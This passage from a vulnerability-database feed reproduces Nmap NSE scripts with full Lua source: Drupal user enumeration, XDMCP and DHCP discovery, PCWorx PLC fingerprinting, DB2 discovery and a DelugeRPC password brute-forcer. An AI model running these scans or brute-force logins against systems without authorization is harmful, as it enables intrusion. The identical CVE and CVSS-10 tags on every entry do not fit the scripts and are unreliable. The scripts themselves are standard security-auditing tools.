admin\n-- | alex\n-- | manager\n-- |_ user\n--\n-- @args http-drupal-enum-users.root base path. Defaults to \"/\"\n\nauthor = \"Hani Benhabiles\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n local root = stdnse.get_script_args(SCRIPT_NAME .. \".root\") or \"/\"\n local character, allrequests,user\n local result = {}\n\n -- ensure that root ends with a trailing slash\n if ( not(root:match(\".*/$\")) ) then\n root = root .. \"/\"\n end\n\n -- characters that usernames may begin with\n -- + is space in url\n local characters = \"abcdefghijklmnopqrstuvwxyz.-123456789+\"\n\n for character in characters:gmatch(\".\") do\n -- add request to pipeline\n allrequests = http.pipeline_add(root.. 'admin/views/ajax/autocomplete/user/' .. character, nil, allrequests, \"GET\")\n end\n\n -- send requests\n local pipeline_responses = http.pipeline_go(host, port, allrequests)\n if not pipeline_responses then\n stdnse.debug1(\"No answers from pipelined requests\")\n return nil\n end\n\n for i, response in pairs(pipeline_responses) do\n if response.status == 200 then\n local status, info = json.parse(response.body)\n if status then\n for _,user in pairs(info) do\n if user ~= \"Anonymous\" then\n table.insert(result, user)\n end\n end\n end\n end\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:16", "description": "Requests an XDMCP (X display manager control protocol) session and lists supported authentication and authorization mechanisms.\n\n## Example Usage \n \n \n nmap -sU -p 177 --script xdmcp-discover <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 177/udp open|filtered xdmcp\n | xdmcp-discover:\n | Session id: 0x0000703E\n | Authorization name: MIT-MAGIC-COOKIE-1\n |_ Authorization data: c282137c9bf8e2af88879e6eaa922326\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [xdmcp](<../lib/xdmcp.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-26T19:35:19", "type": "nmap", "title": "xdmcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:XDMCP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/xdmcp-discover.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal xdmcp = require \"xdmcp\"\n\ndescription = [[\nRequests an XDMCP (X display manager control protocol) session and lists supported authentication and authorization mechanisms.\n]]\n\n---\n-- @usage\n-- nmap -sU -p 177 --script xdmcp-discover <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 177/udp open|filtered xdmcp\n-- | xdmcp-discover:\n-- | Session id: 0x0000703E\n-- | Authorization name: MIT-MAGIC-COOKIE-1\n-- |_ Authorization data: c282137c9bf8e2af88879e6eaa922326\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\"}\n\n\nportrule = shortport.port_or_service(177, \"xdmcp\", \"udp\")\n\nlocal mutex = nmap.mutex(\"xdmcp-discover\")\nlocal function fail(err) return stdnse.format_output(false, err) end\n\n\naction = function(host, port)\n\n local DISPLAY_ID = 1\n local result = {}\n\n local helper = xdmcp.Helper:new(host, port)\n local status = helper:connect()\n if ( not(status) ) then\n return fail(\"Failed to connect to server\")\n end\n\n local status, response = helper:createSession(nil,\n {\"MIT-MAGIC-COOKIE-1\", \"XDM-AUTHORIZATION-1\"}, DISPLAY_ID)\n\n if ( not(status) ) then\n return fail(\"Failed to create xdmcp session\")\n end\n\n table.insert(result, (\"Session id: 0x%.8X\"):format(response.session_id))\n if ( response.auth_name and 0 < #response.auth_name ) then\n table.insert(result, (\"Authentication name: %s\"):format(response.auth_name))\n end\n if ( response.auth_data and 0 < #response.auth_data ) then\n table.insert(result, (\"Authentication data: %s\"):format(stdnse.tohex(response.auth_data)))\n end\n if ( response.authr_name and 0 < #response.authr_name ) then\n table.insert(result, (\"Authorization name: %s\"):format(response.authr_name))\n end\n if ( response.authr_data and 0 < #response.authr_data ) then\n table.insert(result, (\"Authorization data: %s\"):format(stdnse.tohex(response.authr_data)))\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:07", "description": "Performs brute force password auditing against the DelugeRPC daemon.\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script deluge-rpc-brute -p 58846 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON TTL\n 58846/tcp open unknown syn-ack 0\n | deluge-rpc-brute:\n | Accounts\n | admin:default - Valid credentials\n | Statistics\n |_ Performed 8 guesses in 1 seconds, average tps: 8\n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n * [zlib](<../lib/zlib.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-18T17:10:59", "type": "nmap", "title": "deluge-rpc-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-07-20T20:58:30", "id": "NMAP:DELUGE-RPC-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/deluge-rpc-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\n\nlocal have_zlib, zlib = pcall(require, \"zlib\")\n\ndescription = [[\nPerforms brute force password auditing against the DelugeRPC daemon.\n]]\n\n---\n-- @usage\n-- nmap --script deluge-rpc-brute -p 58846 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON TTL\n-- 58846/tcp open unknown syn-ack 0\n-- | deluge-rpc-brute:\n-- | Accounts\n-- | admin:default - Valid credentials\n-- | Statistics\n-- |_ Performed 8 guesses in 1 seconds, average tps: 8\n\nauthor = \"Claudiu Perta <claudiu.perta@gmail.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service(58846, \"deluge-rpc\")\n\n-- Returns an rencoded login request with the given username and password.\n-- The format of the login command is the following:\n--\n-- ((0, 'daemon.login', ('username', 'password'), {}),)\n--\n-- This is inspired from deluge source code, in particular, see\n-- http://git.deluge-torrent.org/deluge/tree/deluge/rencode.py\nlocal rencoded_login_request = function(username, password)\n local INT_POS_FIXED_START = 0\n local INT_POS_FIXED_COUNT = 44\n\n -- Dictionaries with length embedded in typecode.\n local DICT_FIXED_START = 102\n local DICT_FIXED_COUNT = 25\n\n -- Strings with length embedded in typecode.\n local STR_FIXED_START = 128\n local STR_FIXED_COUNT = 64\n\n -- Lists with length embedded in typecode.\n local LIST_FIXED_START = 192\n local LIST_FIXED_COUNT = 64\n\n if #username > 0xff - STR_FIXED_START then\n return nil, \"Username too long\"\n elseif #password > 0xff - STR_FIXED_START then\n return nil, \"Password too long\"\n end\n\n -- Encode the login request:\n -- ((0, 'daemon.login', ('username', 'password'), {}),)\n local request = string.pack(\"BBBB\",\n LIST_FIXED_START + 1,\n LIST_FIXED_START + 4,\n INT_POS_FIXED_START,\n STR_FIXED_START + string.len(\"daemon.login\")\n )\n .. \"daemon.login\"\n .. string.pack(\"BB\",\n LIST_FIXED_START + 2,\n STR_FIXED_START + string.len(username)\n )\n .. username\n .. string.pack(\"B\",\n STR_FIXED_START + string.len(password)\n )\n .. password\n .. string.pack(\"B\", DICT_FIXED_START)\n\n return request\nend\n\nDriver = {\n\n new = function(self, host, port, invalid_users)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.invalid_users = invalid_users\n return o\n end,\n\n connect = function(self)\n local status, err\n self.socket = brute.new_socket()\n self.socket:set_timeout(\n ((self.host.times and self.host.times.timeout) or 8) * 1000)\n\n local status, err = self.socket:connect(self.host, self.port, \"ssl\")\n if not status then\n return false, brute.Error:new(\"Failed to connect to server\")\n end\n\n return true\n end,\n\n disconnect = function(self)\n self.socket:close()\n end,\n\n login = function(self, username, password)\n if (self.invalid_users[username]) then\n return false, brute.Error:new(\"Invalid user\")\n end\n\n local request, err = rencoded_login_request(username, password)\n if not request then\n return false, brute.Error:new(err)\n end\n local status, err = self.socket:send(zlib.compress(request))\n\n if not status then\n return false, brute.Error:new(\"Login error\")\n end\n\n local status, response = self.socket:receive()\n if not status then\n\n return false, brute.Error:new(\"Login error\")\n end\n\n response = zlib.decompress(response)\n if response:match(\"BadLoginError\") then\n local error_message = \"Login error\"\n if response:match(\"Username does not exist\") then\n self.invalid_users[username] = true\n error_message = \"Username not found\"\n elseif response:match(\"Password does not match\") then\n error_message = \"Username not found\"\n end\n return false, brute.Error:new(error_message)\n end\n\n return true, creds.Account:new(username, password, creds.State.VALID)\n end,\n\n check = function(self)\n return true\n end\n}\n\naction = function(host, port)\n\n if not have_zlib then\n return \"Error: zlib required!\"\n end\n\n local invalid_users = {}\n local engine = brute.Engine:new(Driver, host, port, invalid_users)\n\n engine.options.script_name = SCRIPT_NAME\n local status, results = engine:start()\n\n return results\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:39:34", "description": "This NSE script will query and parse pcworx protocol to a remote PLC. The script will send a initial request packets and once a response is received, it validates that it was a proper response to the command that was sent, and then will parse out the data. PCWorx is a protocol and Program by Phoenix Contact. \n\n<http://digitalbond.com>\n\n## Example Usage \n \n \n nmap --script pcworx-info -p 1962 <host>\n \n \n\n## Script Output \n \n \n | pcworx-info:\n | PLC Type: ILC 330 ETH\n | Model Number: 2737193\n | Firmware Version: 3.95T\n | Firmware Date: Mar 2 2012\n |_ Firmware Time: 09:39:02\n\n## Requires \n\n * [string](<>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-06T04:27:47", "type": "nmap", "title": "pcworx-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-01-14T15:30:31", "id": "NMAP:PCWORX-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/pcworx-info.html", "sourceData": "local string = require \"string\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nThis NSE script will query and parse pcworx protocol to a remote PLC.\nThe script will send a initial request packets and once a response is received,\nit validates that it was a proper response to the command that was sent, and then\nwill parse out the data. PCWorx is a protocol and Program by Phoenix Contact.\n\n\nhttp://digitalbond.com\n]]\n---\n-- @usage\n-- nmap --script pcworx-info -p 1962 <host>\n--\n--\n-- @output\n--| pcworx-info:\n--| PLC Type: ILC 330 ETH\n--| Model Number: 2737193\n--| Firmware Version: 3.95T\n--| Firmware Date: Mar 2 2012\n--|_ Firmware Time: 09:39:02\n\n--\n--\n-- @xmloutput\n--<elem key=\"PLC Type\">ILC 330 ETH</elem>\n--<elem key=\"Model Number\">2737193</elem>\n--<elem key=\"Firmware Version\">3.95T</elem>\n--<elem key=\"Firmware Date\">Mar 2 2012</elem>\n--<elem key=\"Firmware Time\">09:39:02</elem>\n\nauthor = \"Stephen Hilt (Digital Bond)\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\"}\n\nportrule = shortport.port_or_service(1962, \"pcworx\", \"tcp\")\n\n-- Safely extract a zero-terminated string if the blob is long enough\n-- Returns nil if it is not.\nlocal function get_string(blob, offset)\n if #blob >= offset then\n return string.unpack(\"z\", blob, offset)\n end\nend\n---\n-- Action Function that is used to run the NSE. This function will send the initial query to the\n-- host and port that were passed in via nmap. The initial response is parsed to determine if host\n-- is a pcworx Protocol device. If it is then more actions are taken to gather extra information.\n--\n-- @param host Host that was scanned via nmap\n-- @param port port that was scanned via nmap\naction = function(host,port)\n local init_comms = \"\\x01\\x01\\0\\x1a\\0\\0\\0\\0x\\x80\\0\\x03\\0\\x0cIBETH01N0_M\\0\"\n\n -- create table for output\n local output = stdnse.output_table()\n\n -- create new socket\n local socket = nmap.new_socket()\n -- define the catch of the try statement\n local catch = function()\n socket:close()\n end\n local try = nmap.new_try(catch)\n\n try(socket:connect(host, port))\n try(socket:send(init_comms))\n local response = try(socket:receive())\n\n if not response:match(\"^\\x81\") then\n stdnse.debug1(\"Unexpected or unknown PCWorx message.\")\n return nil\n end\n -- pcworx has a session ID that is generated by the PLC\n -- This will pull the SID so we can communicate further to the PLC\n local sid = string.sub(response, 18, 18)\n local init_comms2 = \"\\x01\\x05\\0\\x16\\0\\x01\\0\\0\\x78\\x80\\0\" .. sid .. \"\\0\\0\\0\\x06\\0\\x04\\x02\\x95\\0\\0\"\n try(socket:send(init_comms2))\n -- receive response\n response = try(socket:receive())\n -- TODO: verify this\n\n -- this is the request that will pull all the information from the PLC\n local req_info = \"\\x01\\x06\\0\\x0e\\0\\x02\\0\\0\\0\\0\\0\" .. sid .. \"\\x04\\0\"\n try(socket:send(req_info))\n -- receive response\n response = try(socket:receive())\n\n -- if the response starts with 0x81 then we will continue\n if not response:match(\"^\\x81\") then\n stdnse.debug1(\"Unexpected or unknown PCWorx message.\")\n socket:close()\n return nil\n end\n\n -- create output table with proper data\n output[\"PLC Type\"] = get_string(response, 31)\n output[\"Model Number\"] = get_string(response, 153)\n output[\"Firmware Version\"] = get_string(response, 67)\n output[\"Firmware Date\"] = get_string(response, 80)\n output[\"Firmware Time\"] = get_string(response, 92)\n\n -- close socket and return output table\n socket:close()\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:10", "description": "Attempts to discover DB2 servers on the network by sending a broadcast request to port 523/udp.\n\n## Script Arguments \n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script db2-discover\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-db2-discover:\n | 10.0.200.132 (UBU804-DB2E) - IBM DB2 v9.07.0\n |_ 10.0.200.119 (EDUSRV011) - IBM DB2 v9.07.0\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [target](<../lib/target.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-07-10T08:01:26", "type": "nmap", "title": "broadcast-db2-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-DB2-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-db2-discover.html", "sourceData": "local nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal target = require \"target\"\n\ndescription = [[\nAttempts to discover DB2 servers on the network by sending a broadcast request to port 523/udp.\n]]\n\n---\n-- @usage\n-- nmap --script db2-discover\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-db2-discover:\n-- | 10.0.200.132 (UBU804-DB2E) - IBM DB2 v9.07.0\n-- |_ 10.0.200.119 (EDUSRV011) - IBM DB2 v9.07.0\n\n-- Version 0.1\n-- Created 07/10/2011 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return true end\n\n--- Converts the prodrel server string to a version string\n--\n-- @param server_version string containing the product release\n-- @return ver string containing the version information\nlocal function parseVersion( server_version )\n local pfx = string.sub(server_version,1,3)\n\n if pfx == \"SQL\" then\n local major_version = string.sub(server_version,4,5)\n\n -- strip the leading 0 from the major version, for consistency with\n -- nmap-service-probes results\n if string.sub(major_version,1,1) == \"0\" then\n major_version = string.sub(major_version,2)\n end\n local minor_version = string.sub(server_version,6,7)\n local hotfix = string.sub(server_version,8)\n server_version = major_version .. \".\" .. minor_version .. \".\" .. hotfix\n else\n return \"Unknown version\"\n end\n\n return (\"IBM DB2 v%s\"):format(server_version)\nend\n\naction = function()\n\n local DB2GETADDR = \"DB2GETADDR\\0SQL09010\\0\"\n local socket = nmap.new_socket(\"udp\")\n local result = {}\n local host, port = \"255.255.255.255\", 523\n\n socket:set_timeout(5000)\n local status = socket:sendto( host, port, DB2GETADDR )\n if ( not(status) ) then return end\n\n while(true) do\n local data\n status, data = socket:receive()\n if( not(status) ) then break end\n\n local version, srvname = data:match(\"DB2RETADDR.(SQL%d+).(.-)\\0\")\n local _, ip\n status, _, _, ip, _ = socket:get_info()\n if ( not(status) ) then return end\n\n if target.ALLOW_NEW_TARGETS then target.add(ip) end\n\n if ( status ) then\n table.insert( result, (\"%s - Host: %s; Version: %s\"):format(ip, srvname, parseVersion( version ) ) )\n end\n end\n socket:close()\n\n return stdnse.format_output( true, result )\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:09", "description": "Sends a DHCPINFORM request to a host on UDP port 67 to obtain all the local configuration parameters without allocating a new address. \n\nDHCPINFORM is a DHCP request that returns useful information from a DHCP server, without allocating an IP address. The request sends a list of which fields it wants to know (a handful by default, every field if verbosity is turned on), and the server responds with the fields that were requested. It should be noted that the server doesn't have to return every field, nor does it have to return them in the same order, or honour the request at all. A Linksys WRT54g, for example, completely ignores the list of requested fields and returns a few standard ones. This script displays every field it receives. \n\nWith script arguments, the type of DHCP request can be changed, which can lead to interesting results. Additionally, the MAC address can be randomized, which in should override the cache on the DHCP server and assign a new IP address. Extra requests can also be sent to exhaust the IP address range more quickly. \n\nSome of the more useful fields: \n\n * DHCP Server (the address of the server that responded) \n * Subnet Mask \n * Router \n * DNS Servers \n * Hostname\n\n### See also:\n\n * [ broadcast-dhcp6-discover.nse ](<../scripts/broadcast-dhcp6-discover.html>)\n * [ broadcast-dhcp-discover.nse ](<../scripts/broadcast-dhcp-discover.html>)\n\n## Script Arguments \n\n#### dhcp-discover.dhcptype \n\nThe type of DHCP request to make. By default, DHCPINFORM is sent, but this argument can change it to DHCPOFFER, DHCPREQUEST, DHCPDECLINE, DHCPACK, DHCPNAK, DHCPRELEASE or DHCPINFORM. Not all types will evoke a response from all servers, and many require different fields to contain specific values.\n\n#### dhcp-discover.mac \n\nSet to `native` (default) or `random` or a specific client MAC address in the DHCP request. Keep in mind that you may not see the response if a non-native address is used. Setting it to `random` will possibly cause the DHCP server to reserve a new IP address each time.\n\n#### dhcp-discover.requests \n\nSet to an integer to make up to that many requests (and display the results).\n\n## Example Usage \n \n \n nmap -sU -p 67 --script=dhcp-discover <target>\n\n## Script Output \n \n \n Interesting ports on 192.168.1.1:\n PORT STATE SERVICE\n 67/udp open dhcps\n | dhcp-discover:\n | DHCP Message Type: DHCPACK\n | Server Identifier: 192.168.1.1\n | IP Address Lease Time: 1 day, 0:00:00\n | Subnet Mask: 255.255.255.0\n | Router: 192.168.1.1\n |_ Domain Name Server: 208.81.7.10, 208.81.7.14\n \n\n## Requires \n\n * [dhcp](<../lib/dhcp.html>)\n * [rand](<../lib/rand.html>)\n * [nmap](<../lib/nmap.html>)\n * [outlib](<../lib/outlib.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [ipOps](<../lib/ipOps.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2009-09-10T03:26:53", "type": "nmap", "title": "dhcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-01-19T16:37:36", "id": "NMAP:DHCP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/dhcp-discover.html", "sourceData": "local dhcp = require \"dhcp\"\nlocal rand = require \"rand\"\nlocal nmap = require \"nmap\"\nlocal outlib = require \"outlib\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal ipOps = require \"ipOps\"\n\ndescription = [[\nSends a DHCPINFORM request to a host on UDP port 67 to obtain all the local configuration parameters\nwithout allocating a new address.\n\nDHCPINFORM is a DHCP request that returns useful information from a DHCP server, without allocating an IP\naddress. The request sends a list of which fields it wants to know (a handful by default, every field if\nverbosity is turned on), and the server responds with the fields that were requested. It should be noted\nthat the server doesn't have to return every field, nor does it have to return them in the same order,\nor honour the request at all. A Linksys WRT54g, for example, completely ignores the list of requested\nfields and returns a few standard ones. This script displays every field it receives.\n\nWith script arguments, the type of DHCP request can be changed, which can lead to interesting results.\nAdditionally, the MAC address can be randomized, which in should override the cache on the DHCP server and\nassign a new IP address. Extra requests can also be sent to exhaust the IP address range more quickly.\n\nSome of the more useful fields:\n* DHCP Server (the address of the server that responded)\n* Subnet Mask\n* Router\n* DNS Servers\n* Hostname\n]]\n\n---\n-- @see broadcast-dhcp6-discover.nse\n-- @see broadcast-dhcp-discover.nse\n--\n-- @args dhcp-discover.dhcptype The type of DHCP request to make. By default,\n-- DHCPINFORM is sent, but this argument can change it to DHCPOFFER,\n-- DHCPREQUEST, DHCPDECLINE, DHCPACK, DHCPNAK, DHCPRELEASE or\n-- DHCPINFORM. Not all types will evoke a response from all servers,\n-- and many require different fields to contain specific values.\n-- @args dhcp-discover.mac Set to <code>native</code> (default) or\n-- <code>random</code> or a specific client MAC address in the DHCP\n-- request. Keep in mind that you may not see the response if\n-- a non-native address is used. Setting it to <code>random</code> will\n-- possibly cause the DHCP server to reserve a new IP address each time.\n-- @args dhcp-discover.requests Set to an integer to make up to that many\n-- requests (and display the results).\n--\n-- @usage\n-- nmap -sU -p 67 --script=dhcp-discover <target>\n-- @output\n-- Interesting ports on 192.168.1.1:\n-- PORT STATE SERVICE\n-- 67/udp open dhcps\n-- | dhcp-discover:\n-- | DHCP Message Type: DHCPACK\n-- | Server Identifier: 192.168.1.1\n-- | IP Address Lease Time: 1 day, 0:00:00\n-- | Subnet Mask: 255.255.255.0\n-- | Router: 192.168.1.1\n-- |_ Domain Name Server: 208.81.7.10, 208.81.7.14\n--\n-- @xmloutput\n-- <elem key=\"DHCP Message Type\">DHCPACK</elem>\n-- <elem key=\"Server Identifier\">192.168.1.1</elem>\n-- <elem key=\"IP Address Lease Time\">1 day, 0:00:00</elem>\n-- <elem key=\"Subnet Mask\">255.255.255.0</elem>\n-- <elem key=\"Router\">192.168.1.1</elem>\n-- <table key=\"Domain Name Server\">\n-- <elem>208.81.7.10</elem>\n-- <elem>208.81.7.14</elem>\n-- </table>\n--\n\n--\n-- 2020-01-14 - Revised by nnposter\n-- o Added script argument \"mac\" to prescribe a specific MAC address\n-- o Deprecated argument \"randomize_mac\" in favor of \"mac=random\"\n--\n-- 2011-12-28 - Revised by Patrik Karlsson <patrik@cqure.net>\n-- o Removed DoS code and placed script into discovery and safe categories\n--\n-- 2011-12-27 - Revised by Patrik Karlsson <patrik@cqure.net>\n-- o Changed script to use DHCPINFORM instead of DHCPDISCOVER\n--\n\n\nauthor = \"Ron Bowes\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\"}\n\n\n-- We want to run against a specific host if UDP/67 is open\nfunction portrule(host, port)\n if nmap.address_family() ~= 'inet' then\n stdnse.debug1(\"is IPv4 compatible only.\")\n return false\n end\n\n return shortport.portnumber(67, \"udp\")(host, port)\nend\n\naction = function(host, port)\n local dhcptype = (stdnse.get_script_args(SCRIPT_NAME .. \".dhcptype\") or \"DHCPINFORM\"):upper()\n local dhcptypeid = dhcp.request_types[dhcptype]\n if not dhcptypeid then\n return stdnse.format_output(false, \"Invalid request type (use \"\n .. table.concat(dhcp.request_types_str, \" / \")\n .. \")\")\n end\n\n local reqcount = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".requests\") or 1)\n if not reqcount then\n return stdnse.format_output(false, \"Invalid request count\")\n end\n\n local iface, err = nmap.get_interface_info(host.interface)\n if not (iface and 